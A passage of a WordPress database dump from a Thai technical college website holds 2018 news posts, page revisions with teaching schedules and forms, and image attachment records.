(3991, 3, '2018-09-18 14:36:57', '2018-09-18 07:36:57', '<a href=\"https://www.facebook.com/incubator.rtc/media_set?set=a.2201100180155082&type=3\"><img class=\"aligncenter size-full wp-image-3989\" src=\"/wp-content/uploads/2018/09/18-9-2561-14-38-16.jpg\" alt=\"\" width=\"457\" height=\"567\" /></a>', 'ศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษา วิทยาลัยเทคนิคระยอง ต้อนรับคณะศึกษาดูงานจากวิทยาลัยเทคนิคปราจีนบุรี โดยนายอานุภาพ วาสะสิริ รองผู้อำนวยการฝ่ายแผนงานและความร่วมมือ และนางกุสุมาทย์ ชูจิตต์ ครูแผนกวิชาการตลาด บรรยายให้ความรู้ และพาเยี่ยมชมศูนย์บ่มเพาะแต่ละธุรกิจ กับคณะศึกษาดูงาน ในวันที่ 18 กันยายน 2561 ณ ห้อง Smart ClassRoom วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3988-revision-v1', '', '', '2018-09-18 14:36:57', '2018-09-18 07:36:57', '', 3988, 'http://www.technicrayong.ac.th/3988-revision-v1/', 0, 'revision', '', 0),
(3993, 3, '2018-09-21 10:32:11', '2018-09-21 03:32:11', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D680658688976989%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ 20 กันยายน 2561 วิทยาลัยเทคนิคระยอง นำโดยนายยุทธนา อ่อนส้มกฤษ รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา พร้อมด้วยคณะครู บุคลากรทางการศึกษา ร่วมเดินทางส่งนายไสว สีบูจันดี ซึ่งย้ายมาดำรงตำแหน่งผู้อำนวยการวิทยาลัยอาชีวศึกษาสระบุรี จังหวัดสระบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-20-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561', '', '', '2018-09-21 10:32:11', '2018-09-21 03:32:11', '', 0, 'http://www.technicrayong.ac.th/?p=3993', 293, 'post', '', 0),
(3994, 3, '2018-09-21 10:31:53', '2018-09-21 03:31:53', '', '42204822_680655475643977_5981505686469607424_o', '', 'inherit', 'closed', 'closed', '', '42204822_680655475643977_5981505686469607424_o', '', '', '2018-09-21 10:31:53', '2018-09-21 03:31:53', '', 3993, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/42204822_680655475643977_5981505686469607424_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3995, 3, '2018-09-21 10:32:11', '2018-09-21 03:32:11', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D680658688976989%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ 20 กันยายน 2561 วิทยาลัยเทคนิคระยอง นำโดยนายยุทธนา อ่อนส้มกฤษ รองผู้อำนวยการฝ่ายพัฒนากิจการนักเรียน นักศึกษา พร้อมด้วยคณะครู บุคลากรทางการศึกษา ร่วมเดินทางส่งนายไสว สีบูจันดี ซึ่งย้ายมาดำรงตำแหน่งผู้อำนวยการวิทยาลัยอาชีวศึกษาสระบุรี จังหวัดสระบุรี', '', 'inherit', 'closed', 'closed', '', '3993-revision-v1', '', '', '2018-09-21 10:32:11', '2018-09-21 03:32:11', '', 3993, 'http://www.technicrayong.ac.th/3993-revision-v1/', 0, 'revision', '', 0),
(3997, 4, '2018-09-28 03:49:41', '2018-09-27 20:49:41', '<pre>ตารางสอนครู</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1UehVc3kQSCwR-0iU_DrjBuwM8lENcqTF\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\n\n<a href=\"https://drive.google.com/open?id=1BszDXWLV_blN1Ouaej4U7Dh4CD94RUOq\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\n<pre>ตารางเรียน</pre>\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\n\n<a href=\"https://drive.google.com/open?id=1A6EOADOCHVi7kojV1eOxTVvQ2Kp4rq6b\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\n\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกปิโตรเคมี', '', 'inherit', 'closed', 'closed', '', '2243-autosave-v1', '', '', '2018-09-28 03:49:41', '2018-09-27 20:49:41', '', 2243, 'http://www.technicrayong.ac.th/2243-autosave-v1/', 0, 'revision', '', 0),
(3998, 4, '2018-09-28 03:46:28', '2018-09-27 20:46:28', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1BszDXWLV_blN1Ouaej4U7Dh4CD94RUOq\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1A6EOADOCHVi7kojV1eOxTVvQ2Kp4rq6b\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกปิโตรเคมี', '', 'inherit', 'closed', 'closed', '', '2243-revision-v1', '', '', '2018-09-28 03:46:28', '2018-09-27 20:46:28', '', 2243, 'http://www.technicrayong.ac.th/2243-revision-v1/', 0, 'revision', '', 0),
(3999, 4, '2018-09-28 03:53:00', '2018-09-27 20:53:00', '<pre>ตารางสอนครู</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1UehVc3kQSCwR-0iU_DrjBuwM8lENcqTF\"><span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span></a>\r\n\r\n<a href=\"https://drive.google.com/open?id=1BszDXWLV_blN1Ouaej4U7Dh4CD94RUOq\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>\r\n<pre>ตารางเรียน</pre>\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 1/2560</span>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2560</span>\r\n\r\n<a href=\"https://drive.google.com/open?id=1A6EOADOCHVi7kojV1eOxTVvQ2Kp4rq6b\"><span style=\"color: #ff0000;\">ปีการศึกษา 1/2561</span></a>\r\n\r\n<span style=\"color: #ff0000;\">ปีการศึกษา 2/2561</span>', 'ตารางแผนกปิโตรเคมี', '', 'inherit', 'closed', 'closed', '', '2243-revision-v1', '', '', '2018-09-28 03:53:00', '2018-09-27 20:53:00', '', 2243, 'http://www.technicrayong.ac.th/2243-revision-v1/', 0, 'revision', '', 0),
(4001, 4, '2018-09-28 04:18:45', '2018-09-27 21:18:45', '<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/file/d/1yfr-R9TRPAKzbTqzhKwgos92gWFEhU63/view?usp=sharing\"><span style=\"color: #800080;\">คู่มือ PLC</span></a></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1h4nIcmATgPGm4SsrvyheCzZT457lOiRc\">ว.21</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1sGN5LP53gIappo8Oc-j7Y7zpus4UUxpj\">ว.22</a></p>', 'เอกสารพัฒนาการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '2169-revision-v1', '', '', '2018-09-28 04:18:45', '2018-09-27 21:18:45', '', 2169, 'http://www.technicrayong.ac.th/2169-revision-v1/', 0, 'revision', '', 0),
(4002, 4, '2018-09-28 05:10:53', '2018-09-27 22:10:53', '<hr />\r\n\r\nแบบฟอร์มสอนแทน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มสอนชดเชย\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/open?id=1GPjTvihsnS-4DB43Lq9A6Gnc1EACKfa7\">แบบฟอร์มใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน</a>\r\n\r\n<hr />\r\n\r\n \r\n\r\nแบบฟอร์มนิเทศการสอน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มประเมินแผนการจัดการเรียนรู้\r\n\r\n<hr />\r\n\r\nแบบฟอร์มโครงการสอน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มแผนจัดการเรียนรู้\r\n\r\n<hr />\r\n\r\nแบบฟอร์มบันทึกการสอน\r\n\r\n<hr />\r\n\r\n \r\n\r\n<a href=\"https://drive.google.com/file/d/1QYe6ETuFyXakmTmwTxRqW5Dg7t7Hd8Bq/view?usp=sharing\">แบบฟอร์มใบปะหน้าใบเบิกค่าสอนเกินภาระงาน</a>\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/open?id=1YhOMDlJSOYmtlIAUDqAgM_MS_Fr5aj_S\">บันทึกข้อความมอบหน้าที่ทำใบเบิก</a>\r\n\r\n<hr />\r\n\r\nแบบฟอร์ม สมอ.1 แบบเสนอรายชื่อหนังสือเรียนตามนโยบายเรียนฟรีี เรียนดี 15 ปี\r\n\r\n<hr />\r\n\r\nแบบฟอร์ม สมอ.2 แบบรายงานการจัดซื้อหนังสือเรียน\r\n\r\n ', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-09-28 05:10:53', '2018-09-27 22:10:53', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(4003, 4, '2018-09-28 05:11:13', '2018-09-27 22:11:13', '<hr />\r\n\r\nแบบฟอร์มสอนแทน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มสอนชดเชย\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/open?id=1GPjTvihsnS-4DB43Lq9A6Gnc1EACKfa7\">แบบฟอร์มใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน</a>\r\n\r\n<hr />\r\n\r\nแบบฟอร์มนิเทศการสอน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มประเมินแผนการจัดการเรียนรู้\r\n\r\n<hr />\r\n\r\nแบบฟอร์มโครงการสอน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มแผนจัดการเรียนรู้\r\n\r\n<hr />\r\n\r\nแบบฟอร์มบันทึกการสอน\r\n\r\n<hr />\r\n\r\n \r\n\r\n<a href=\"https://drive.google.com/file/d/1QYe6ETuFyXakmTmwTxRqW5Dg7t7Hd8Bq/view?usp=sharing\">แบบฟอร์มใบปะหน้าใบเบิกค่าสอนเกินภาระงาน</a>\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/open?id=1YhOMDlJSOYmtlIAUDqAgM_MS_Fr5aj_S\">บันทึกข้อความมอบหน้าที่ทำใบเบิก</a>\r\n\r\n<hr />\r\n\r\nแบบฟอร์ม สมอ.1 แบบเสนอรายชื่อหนังสือเรียนตามนโยบายเรียนฟรีี เรียนดี 15 ปี\r\n\r\n<hr />\r\n\r\nแบบฟอร์ม สมอ.2 แบบรายงานการจัดซื้อหนังสือเรียน\r\n\r\n ', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-09-28 05:11:13', '2018-09-27 22:11:13', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(4004, 4, '2018-09-28 05:12:04', '2018-09-27 22:12:04', '<hr />\r\n\r\nแบบฟอร์มสอนแทน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มสอนชดเชย\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/open?id=1GPjTvihsnS-4DB43Lq9A6Gnc1EACKfa7\">แบบฟอร์มใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน</a>\r\n\r\n<hr />\r\n\r\nแบบฟอร์มนิเทศการสอน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มประเมินแผนการจัดการเรียนรู้\r\n\r\n<hr />\r\n\r\nแบบฟอร์มโครงการสอน\r\n\r\n<hr />\r\n\r\nแบบฟอร์มแผนจัดการเรียนรู้\r\n\r\n<hr />\r\n\r\nแบบฟอร์มบันทึกการสอน\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/1QYe6ETuFyXakmTmwTxRqW5Dg7t7Hd8Bq/view?usp=sharing\">แบบฟอร์มใบปะหน้าใบเบิกค่าสอนเกินภาระงาน</a>\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/open?id=1YhOMDlJSOYmtlIAUDqAgM_MS_Fr5aj_S\">บันทึกข้อความมอบหน้าที่ทำใบเบิก</a>\r\n\r\n<hr />\r\n\r\nแบบฟอร์ม สมอ.1 แบบเสนอรายชื่อหนังสือเรียนตามนโยบายเรียนฟรี 15 ปี\r\n\r\n<hr />\r\n\r\nแบบฟอร์ม สมอ.2 แบบรายงานการจัดซื้อหนังสือเรียนตามนโยบายเรียนฟรี 15 ปี', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-09-28 05:12:04', '2018-09-27 22:12:04', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(4005, 4, '2018-09-28 05:13:21', '2018-09-27 22:13:21', 'แบบคำร้องขอเปิดภาคเรียนฤดูร้อน\r\n\r\nแบบคำร้องขออนุญาตไปเรียนสถานศึกษาอื่น', 'แบบฟอร์มสำหรับนักเรียนนักศึกษา', '', 'inherit', 'closed', 'closed', '', '1189-revision-v1', '', '', '2018-09-28 05:13:21', '2018-09-27 22:13:21', '', 1189, 'http://www.technicrayong.ac.th/1189-revision-v1/', 0, 'revision', '', 0),
(4006, 3, '2018-09-28 09:34:58', '2018-09-28 02:34:58', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F09%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนตุลาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1-2561', '', '', '2018-09-28 09:34:58', '2018-09-28 02:34:58', '', 0, 'http://www.technicrayong.ac.th/?p=4006', 292, 'post', '', 0),
(4008, 3, '2018-09-28 09:34:58', '2018-09-28 02:34:58', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F09%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนตุลาคม 2561', '', 'inherit', 'closed', 'closed', '', '4006-revision-v1', '', '', '2018-09-28 09:34:58', '2018-09-28 02:34:58', '', 4006, 'http://www.technicrayong.ac.th/4006-revision-v1/', 0, 'revision', '', 0),
(4010, 3, '2018-10-01 09:16:11', '2018-10-01 02:16:11', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D681048775604647%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 21 กันยายน 2561 บริษัท มูบาดาลาปิโตรเลียม (ประเทศไทย) จำกัด ร่วมกับ สมาคมประมงระยอง จัดพิธีมอบทุนการศึกษาแก่นักเรียน นักศึกษา ประจำปีการศึกษา 2561 โดยมี นายวรวิทย์ ศุภโชคชัยนายกเทศมนตรีนครระยอง เป็นประธานในพิธี ณ โรงเรียนนครระยองวิทยาคม (วัดโขดใต้) ซึ่งนักเรียน นักศึกษาวิทยาลัยเทคนิคระยองได้รับจัดสรรทุนการศึกษา จำนวน 19 ทุน ทุนละ 5,000 บาท รวมเป็นเงิน 95,000 บาท', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-21%e2%80%8b-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99%e2%80%8b-2561', '', '', '2018-10-01 09:16:11', '2018-10-01 02:16:11', '', 0, 'http://www.technicrayong.ac.th/?p=4010', 291, 'post', '', 0),
(4011, 3, '2018-10-01 09:15:56', '2018-10-01 02:15:56', '', '42194262_681048368938021_8679997324597919744_o', '', 'inherit', 'closed', 'closed', '', '42194262_681048368938021_8679997324597919744_o', '', '', '2018-10-01 09:15:56', '2018-10-01 02:15:56', '', 4010, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/42194262_681048368938021_8679997324597919744_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4012, 3, '2018-10-01 09:16:11', '2018-10-01 02:16:11', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D681048775604647%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 21 กันยายน 2561 บริษัท มูบาดาลาปิโตรเลียม (ประเทศไทย) จำกัด ร่วมกับ สมาคมประมงระยอง จัดพิธีมอบทุนการศึกษาแก่นักเรียน นักศึกษา ประจำปีการศึกษา 2561 โดยมี นายวรวิทย์ ศุภโชคชัยนายกเทศมนตรีนครระยอง เป็นประธานในพิธี ณ โรงเรียนนครระยองวิทยาคม (วัดโขดใต้) ซึ่งนักเรียน นักศึกษาวิทยาลัยเทคนิคระยองได้รับจัดสรรทุนการศึกษา จำนวน 19 ทุน ทุนละ 5,000 บาท รวมเป็นเงิน 95,000 บาท', '', 'inherit', 'closed', 'closed', '', '4010-revision-v1', '', '', '2018-10-01 09:16:11', '2018-10-01 02:16:11', '', 4010, 'http://www.technicrayong.ac.th/4010-revision-v1/', 0, 'revision', '', 0),
(4013, 3, '2018-10-01 09:20:48', '2018-10-01 02:20:48', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.681087722267419&type=3\"><img class=\"aligncenter size-full wp-image-4014\" src=\"/wp-content/uploads/2018/10/1-10-2561-9-20-33.jpg\" alt=\"\" width=\"464\" height=\"568\" /></a>', 'ยินดีต้อนรับ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง ด้วยรักและผูกพัน นายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยอาชีวศึกษาสระบุรี และวันวานที่พากเพียร สู่วันเกษียณที่ภาคภูมิ ในวันที่ 19 กันยายน 2561 ที่ผ่านมา ณ โกลเด้น ซิตี้ ระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a2%e0%b8%b4%e0%b8%99%e0%b8%94%e0%b8%b5%e0%b8%95%e0%b9%89%e0%b8%ad%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a-%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b8%ad', '', '', '2018-10-01 09:20:48', '2018-10-01 02:20:48', '', 0, 'http://www.technicrayong.ac.th/?p=4013', 290, 'post', '', 0),
(4014, 3, '2018-10-01 09:18:10', '2018-10-01 02:18:10', '', '1-10-2561 9-20-33', '', 'inherit', 'closed', 'closed', '', '1-10-2561-9-20-33', '', '', '2018-10-01 09:18:10', '2018-10-01 02:18:10', '', 4013, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/1-10-2561-9-20-33.jpg', 0, 'attachment', 'image/jpeg', 0),
(4015, 3, '2018-10-01 09:20:00', '2018-10-01 02:20:00', '', '42266838_681066905602834_1853973279572754432_o', '', 'inherit', 'closed', 'closed', '', '42266838_681066905602834_1853973279572754432_o', '', '', '2018-10-01 09:20:00', '2018-10-01 02:20:00', '', 4013, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/42266838_681066905602834_1853973279572754432_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4016, 3, '2018-10-01 09:20:48', '2018-10-01 02:20:48', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.681087722267419&type=3\"><img class=\"aligncenter size-full wp-image-4014\" src=\"/wp-content/uploads/2018/10/1-10-2561-9-20-33.jpg\" alt=\"\" width=\"464\" height=\"568\" /></a>', 'ยินดีต้อนรับ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง ด้วยรักและผูกพัน นายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยอาชีวศึกษาสระบุรี และวันวานที่พากเพียร สู่วันเกษียณที่ภาคภูมิ ในวันที่ 19 กันยายน 2561 ที่ผ่านมา ณ โกลเด้น ซิตี้ ระยอง', '', 'inherit', 'closed', 'closed', '', '4013-revision-v1', '', '', '2018-10-01 09:20:48', '2018-10-01 02:20:48', '', 4013, 'http://www.technicrayong.ac.th/4013-revision-v1/', 0, 'revision', '', 0),
(4017, 3, '2018-10-01 09:40:58', '2018-10-01 02:40:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D682519025457622%26id%3D100010985913485&width=500\" width=\"500\" height=\"780\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ 24 กันยายน 2561 สถาบันการอาชีวศึกษาภาคตะวันออก ร่วมกับ บริษัท ซีเอ็ดยูเคชั่น จำกัด (มหาชน) จัดอบรมให้ความรู้การประยุกต์ใช้งานเครื่องพิพม์ 3 มิติ เพื่อการออกแบบสร้างร่วมกับเทคโนโลยีหุ่นยนต์ให้กับครูผู้สอนแผนกวิชาช่างอิเล็กทรอนิกส์ ช่างกลโรงงาน ช่างไฟฟ้า ช่างยนต์ และคอมพิวเติร์ธุรกิจ โดยมี ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิด ณ ห้องประชุมสัมมนาอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c-24-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561-%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%9a%e0%b8%b1', '', '', '2018-10-01 09:40:58', '2018-10-01 02:40:58', '', 0, 'http://www.technicrayong.ac.th/?p=4017', 289, 'post', '', 0),
(4018, 3, '2018-10-01 09:40:29', '2018-10-01 02:40:29', '', '42412985_682515208791337_4285014993486741504_o', '', 'inherit', 'closed', 'closed', '', '42412985_682515208791337_4285014993486741504_o', '', '', '2018-10-01 09:40:29', '2018-10-01 02:40:29', '', 4017, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/42412985_682515208791337_4285014993486741504_o.jpg', 0, 'attachment', 'image/jpeg', 0),
